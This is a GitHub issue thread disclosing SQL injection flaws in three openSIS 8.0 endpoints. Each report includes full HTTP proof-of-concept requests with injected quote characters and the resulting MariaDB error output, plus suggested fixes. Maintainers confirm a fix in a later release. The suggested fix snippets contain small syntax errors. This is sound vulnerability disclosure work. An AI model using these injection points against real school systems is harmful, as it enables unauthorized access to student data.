Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

SQL injection in multiple functions #202

Closed
quanhx11 opened this issue Sep 22, 2021 · 5 comments
Closed

SQL injection in multiple functions #202

quanhx11 opened this issue Sep 22, 2021 · 5 comments
Labels
Next Release Fix will be provided with the next release

Comments

@quanhx11
Copy link

quanhx11 commented Sep 22, 2021

A SQL injection vulnerability exists in version 8.0 of openSIS when MySQL or MariaDB is used as the application database. An attacker can then issue the SQL command through the /opensis/functions/GetStuListFnc.php Grade= parameter
image
POC
image

REQUEST

POST /Modules.php?modname=students/AdvancedReport.php&modfunc=&search_modfunc=list&next_modname=students/AdvancedReport.php HTTP/1.1
Host: 192.168.21.130
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 850
Origin: http://192.168.21.130
Connection: close
Referer: http://192.168.21.130/Modules.php?modname=miscellaneous/Portal.php&failed_login=
Cookie: PHPSESSID=1kkijlk6rkvfn3rs91kjn5hj1i; miniSidebar=0
Upgrade-Insecure-Requests: 1

last=ad&first=a%CC%81cd&stuid=adc&altid=123&addr=dsca&grade='&section=&w_course_period_id=27&marking_period_id=&activity_id=&absences_term=FY&absences_low=&absences_high=&list_gpa=Y&gpa_term=19&gpa_low=&gpa_high=&cgpa=Y&cgpa_low=&cgpa_high=&month_include_active_date=09&day_include_active_date=01&year_include_active_date=2021&class_rank_term=CUM&class_rank_low=&class_rank_high=&letter_grade_exclude=Y&letter_grade_term=19&letter_grade%5B8%5D=Y&sql_save_session=true&mp_comment=&month_from_birthdate=&day_from_birthdate=&month_to_birthdate=&day_to_birthdate=&goal_title=&goal_description=&progress_name=&progress_description=&med_month=&med_day=&med_year=&doctors_note_comments=&type=&imm_month=&imm_day=&imm_year=&imm_comments=&ma_month=&ma_day=&ma_year=&med_alrt_title=&nv_month=&nv_day=&nv_year=&reason=&result=&med_vist_comments=&address_group=Y

RESPONSE

HTTP/1.1 200 OK
Date: Wed, 22 Sep 2021 05:39:16 GMT
Server: Apache/2.4.46 (Debian)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 60208
Connection: close
Content-Type: text/html; charset=UTF-8

[...]
<b>SQL:</b></TD>
			<TD>SELECT COUNT(s.STUDENT_ID) AS STUDENT_COUNT  FROM students s ,student_enrollment ssm  LEFT OUTER JOIN student_address sam ON (ssm.STUDENT_ID=sam.STUDENT_ID AND sam.TYPE='Home Address' ) ,schedule w_ss WHERE ssm.STUDENT_ID=s.STUDENT_ID   AND ssm.SYEAR='2023' AND (ssm.START_DATE IS NOT NULL AND ('2021-09-22'<=ssm.END_DATE OR ssm.END_DATE IS NULL)  OR ssm.DROP_CODE=33 )  AND ssm.SYEAR='2023' AND ssm.SCHOOL_ID='1' AND w_ss.STUDENT_ID=s.STUDENT_ID AND w_ss.SYEAR=ssm.SYEAR AND w_ss.SCHOOL_ID=ssm.SCHOOL_ID AND w_ss.COURSE_PERIOD_ID='27' AND ('2021-09-22' BETWEEN w_ss.START_DATE AND w_ss.END_DATE OR w_ss.END_DATE IS NULL) AND NOT EXISTS (SELECT '' FROM student_report_card_grades sg3 WHERE sg3.STUDENT_ID=ssm.STUDENT_ID AND sg3.SYEAR=ssm.SYEAR AND sg3.REPORT_CARD_GRADE_ID IN ('8')AND sg3.MARKING_PERIOD_ID='19' ) AND s.IS_DISABLE IS NULL AND ssm.STUDENT_ID = 'adc'  AND LOWER(s.ALT_ID) LIKE '123%'  AND LOWER(s.LAST_NAME) LIKE 'ad%'  AND LOWER(s.FIRST_NAME) LIKE 'ácd%'  AND ssm.GRADE_ID IN(SELECT id FROM school_gradelevels WHERE title=NULL'') AND (LOWER(sam.STREET_ADDRESS_1) LIKE '%dsca%' OR LOWER(sam.CITY) LIKE 'dsca%' OR LOWER(sam.STATE)='dsca' OR ZIPCODE LIKE 'dsca%')</TD>
		</TR>
		</TR><TR>
			<TD align=right><b>Traceback:</b></TD>
			<TD>/var/www/opensis/functions/GetStuListFnc.php at 680</TD>
		</TR>
		</TR><TR>
			<TD align=right><b>Additional Information:</b></TD>
			<TD>You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''') AND (LOWER(sam.STREET_ADDRESS_1) LIKE '%dsca%' OR LOWER(sam.CITY) LIKE 'd...' at line 1</TD>
		</TR>
[...]


SOLUTION
Use function sqlSecurityFilter() before assign $_REQUEST['grade'] to query.
the code should look like:

  if ($_REQUEST['grade']) {
        $grade=sqlSecurityFilter($_REQUEST['grade'])
        $allSQL .= ' AND ssm.GRADE_ID IN(SELECT id FROM school_gradelevels WHERE title= \'' . singleQuoteReplace("'", "\'", $grade . '\')';
    }
@quanhx11 quanhx11 changed the title SQL injection in function GETSTULISTFNC.PHP SQL injection in multiple function Sep 22, 2021
@quanhx11
Copy link
Author

quanhx11 commented Sep 22, 2021

A SQL injection vulnerability exists in version 8.0 of openSIS when MySQL or MariaDB is used as the application database. An attacker can then issue the SQL command through the /opensis/modules/grades/EditHistoryMarkingPeriods.php, values[new][MP_TYPE]= parameter.

image

POC:

image

REQUEST:

POST /Modules.php?modname=grades/EditHistoryMarkingPeriods.php&modfunc=update&tab_id=&mp_id= HTTP/1.1
Host: 192.168.21.130
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 225
Origin: http://192.168.21.130
Connection: close
Referer: http://192.168.21.130/Modules.php?modname=eligibility/TeacherCompletion.php&LO_direction=1&portal_search=true&LO_search=
Cookie: PHPSESSID=1kkijlk6rkvfn3rs91kjn5hj1i; miniSidebar=0
Upgrade-Insecure-Requests: 1

values[new][MP_'TYPE]=year&values%5Bnew%5D%5BNAME%5D=q&month_values%5Bnew%5D%5BPOST_END_DATE%5D=09&day_values%5Bnew%5D%5BPOST_END_DATE%5D=01&year_values%5Bnew%5D%5BPOST_END_DATE%5D=2021&values%5Bnew%5D%5BSYEAR%5D=2008

RESPONSE:

HTTP/1.1 200 OK
Date: Wed, 22 Sep 2021 05:39:16 GMT
Server: Apache/2.4.46 (Debian)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 60208
Connection: close
Content-Type: text/html; charset=UTF-8

[…]
		<pre> DB Execute Failed </pre></TD>
		</TR><TR>
			<TD align=right><b>SQL:</b></TD>
			<TD>INSERT INTO history_marking_periods (MARKING_PERIOD_ID, SCHOOL_ID, MP_'TYPE,NAME,SYEAR,POST_END_DATE) values(40, 1, 'year','q','2008','2021-09-01')</TD>
		</TR>
		</TR><TR>
			<TD align=right><b>Traceback:</b></TD>
			<TD>/var/www/opensis/modules/grades/EditHistoryMarkingPeriods.php at 92</TD>
		</TR>
		</TR><TR>
			<TD align=right><b>Additional Information:</b></TD>
			<TD>You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''TYPE,NAME,SYEAR,POST_END_DATE) values(40, 1, 'year','q','2008','2021-09-01')' at line 1</TD>
		</TR>
 
[…]

SOLUTION:

Use function sqlSecurityFilter() before foreach variable $_REQUEST['staff'].

`foreach (sqlSecurityFilter($_REQUEST['values']) as $id => $columns)`

@quanhx11
Copy link
Author

quanhx11 commented Sep 22, 2021

A SQL injection vulnerability exists in version 8.0 of openSIS when MySQL or MariaDB is used as the application database. An attacker can then issue the SQL command through the /opensis/modules/eligibility/EntryTimes.php, values[STAR'T_DAY]= parameter.

image

POC:

image

REQUEST:

POST /Modules.php?modname=eligibility/EntryTimes.php HTTP/1.1
Host: 192.168.21.130
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 92
Origin: http://192.168.21.130
Connection: close
Referer: http://192.168.21.130/Modules.php?modname=miscellaneous/Portal.php&failed_login=
Cookie: PHPSESSID=1kkijlk6rkvfn3rs91kjn5hj1i; miniSidebar=0
Upgrade-Insecure-Requests: 1

values[STAR'T_DAY]=0&values%5BSTART_TIME%5D=&values%5BEND_DAY%5D=0&values%5BEND_TIME%5D=

RESPONSE:

HTTP/1.1 200 OK
Date: Wed, 22 Sep 2021 05:39:16 GMT
Server: Apache/2.4.46 (Debian)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 60208
Connection: close
Content-Type: text/html; charset=UTF-8

[…]
		<b>SQL:</b></TD>
			<TD>INSERT INTO program_config (SYEAR,SCHOOL_ID,PROGRAM,TITLE,VALUE) values('2023','1','eligibility','STAR'T_DAY','0')</TD>
		</TR>
		</TR><TR>	
<b>Traceback:</b></TD>
			<TD>/var/www/opensis/modules/eligibility/EntryTimes.php at 68</TD>
		</TR><TR>
			<TD align=right><b>Additional Information:</b></TD>
			<TD>You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'T_DAY','0')' at line 1</TD>
		</TR>
		</TABLE>
		<TABLE CELLSPACING=10 BORDER=0> 
[…]

SOLUTION:

Use function sqlSecurityFilter() before foreach variable $_REQUEST['values'].

$a = sqlSecurityFilter($_REQUEST['values']);

@quanhx11 quanhx11 changed the title SQL injection in multiple function SQL injection in multiple functions Sep 23, 2021
@openSISAdmin
Copy link
Member

Please use the latest code from the repo......not the zip file and try this. We have committed several updates lately.

@sarika0lal
Copy link
Contributor

Hello,

We appreciate your observation and would like to inform that your suggestion has been implemented for the next release.

Thank you.

@sarika0lal sarika0lal added the Next Release Fix will be provided with the next release label Apr 6, 2022
@sarika0lal
Copy link
Contributor

We released a new version and the issue has been fixed there. Please check and let us know your feedback in case you have any.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
Next Release Fix will be provided with the next release
Projects
None yet
Development

No branches or pull requests

3 participants